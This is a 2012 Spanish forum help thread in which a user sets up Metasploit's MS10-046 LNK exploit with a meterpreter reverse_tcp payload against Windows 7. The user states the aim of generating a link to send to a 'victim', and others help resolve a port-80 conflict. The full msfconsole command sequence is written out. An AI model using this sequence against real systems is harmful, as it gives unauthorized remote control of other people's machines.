[Solucionado] Me salta error de permisos en metasploit

Dryken · 5 Agosto 2012, 14:43 PM

Resulta que al ejecutar el exploit con su payload me salta un error que a simple vista parece que es porque no tengo los permisos necesarios para poder ejecutarlo.

Citarexploit failed: Errno::EACCES permission denied - bind(2)

El exploit y el payload que uso son para tomar el control de la shell de windows 7, son estos.

Citaruse windows/browser/ms10_046_shortcut_icon_dllloader
set payload windows/meterpreter/reverse_tcp

No sé cúal es el motivo exacto ni como podría solucionarlo, espero que podáis echarme una mano.

adastra · 7 Agosto 2012, 09:20 AM

Con que usuario estas iniciando la consola de metasploit? el problema esta en que no tienes permisos para abrir el puerto.

Dryken · 7 Agosto 2012, 20:17 PM

Pues la consola al principio la ejecutaba como usuario normal pero al ver el problema la volví a ejecutar como administrador pero sin resultados, obtenía el mismo mensaje de error referente al permiso de administrador.

Lo único que intento ejecutar es esto...

Citarsearch LNK
use windows/browser/ms10_046_shortcut_icon_dllloader
show payloads
set payload windows/meterpreter/reverse_tcp
show options
set SRVHOST IP local mia
set LHOST IP local mia
show options
exploit

A partir de aquí se supone que debería de generar un enlace para enviárselo a la víctima...pero no lo genera.

El tema de ejecutarlo como administardor con lo típico del botón derecho no me da resultados. No sé si será otro fallo el que esté comentiendo, aunque el mensaje es claramnete referente al permiso del admin.

adastra · 7 Agosto 2012, 23:36 PM

Si mal no recuerdo, el puerto 80 necesita estar disponible (o el 8080) es posible que tengas alguno servidor aparte corriendo en alguno de esos puertos? Este exploit lo que intenta hacer es crear un pequeño servidor web con el payload malicioso, me da la sensación de que el error que te da, es que no puede hacer un "bind" del puerto, ya que esta ocupado.
intenta establecer un valor distinto a la propiedad SRVPORT

set SRVPORT 8081

A ver si es eso.

Dryken · 8 Agosto 2012, 02:09 AM

Compañero gracias por la información, lo he probado con con el puerto 8081 y sus derivados pero por lo visto el SRVPORT sólo permite estar establecido en el 80, vamos que no puede cambiarse.

Tampoco deja modificarse el SRVHOST ni el LHOST ya que si coloco otra dirección que no sea mi IP local no va, da más errores que antes.

He mirado con el current ports que en el PC el puerto 80 (TCP) está siendo utilizado por 2 procesos del sistema, pero no creo que sea inconveniente el que se esté ejecutando para poder iniciar el exploit.

it3r · 8 Agosto 2012, 04:35 AM

bajate el netcat y pon

nc.exe -lvvp 80

si te sale un error es porque ya hay una conexión que esta escuchandoo en el puerto 80, por lo cual debes cerrar aquella conexión ya que es una sola conexión a la escucha por puerto.

saludos

adastra · 8 Agosto 2012, 09:16 AM

Con tu última respuesta has confirmado lo que habia dicho.
Si el puerto 80 ya esta siendo utilizado por otro proceso en el sistema, el servidor necesario para el exploit no puede arrancar. Tienes que detener el proceso que este utilizando dicho puerto y posteriormente iniciar el exploit, hasta que no hagas eso, el servidor para el exploit no te funcionará.

Dryken · 8 Agosto 2012, 13:23 PM

it3r hacía tiempo que no utilizaba el netcat, lo he vuelto a poner en escucha y llevas toda la razón, me salta este mensaje.

CitarCan´t grab 0.0.0.0:80 with band

Tal y como tu y adastra habéis mencionado el problema es exáctamente que el puerto 80 está en uso por esos 2 procesos, vale simplemente quitándolo ya debe de funcionar.

Edito
Solucionado, el problema era ese, lo he probado y el exploit ya funciona. Muchas gracias por toda la ayuda compañeros!